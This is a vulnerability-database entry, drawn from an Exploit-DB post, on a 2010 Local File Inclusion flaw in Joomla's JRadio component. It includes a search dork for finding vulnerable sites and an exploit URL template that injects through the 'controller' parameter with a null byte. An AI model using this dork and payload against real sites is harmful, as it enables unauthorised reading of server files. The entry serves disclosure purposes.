Joomla com_jradio LFI Vulnerability

vendor:

JRadio

by:

Sid3^effects aKa HaRi

7,5

CVSS

HIGH

LFI Vulnerability

CWE

Product Name: JRadio

Affected Version From: Joomla 1.5

Affected Version To: Joomla 1.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla com_jradio LFI Vulnerability

JRadio is a powerful internet radio receiver for Joomla 1.5 based websites. An attacker can exploit this vulnerability by sending a crafted request to the server containing a malicious Local File Inclusion (LFI) payload.

Mitigation:

N/A

Source

Exploit-DB raw data:

#Name :Joomla com_jradio LFI Vulnerability
#Date : Dec,16 2010
#Vendor Url :http://joomlacode.org/gf/project/componentjradio/
#Dork:inurl:com_jradio
#Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
#Big hugs : Th3 RDX,Hanan_butt,
#special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,SeeMe,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!

Te,n4pst3rr,tranquiller
#greetz to :!Op3x_ninjato team,www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
JRadio is a powerful internet radio receiver for Joomla 1.5 based websites.

###############################################################################################################
Exploit:LFI Vulnerability

http://server/index.php?option=com_jradio&controller=[LFI]%00

###############################################################################################################
Fix:
   N/a
###############################################################################################################
# 0day no more
# Sid3^effects
# 1337day.com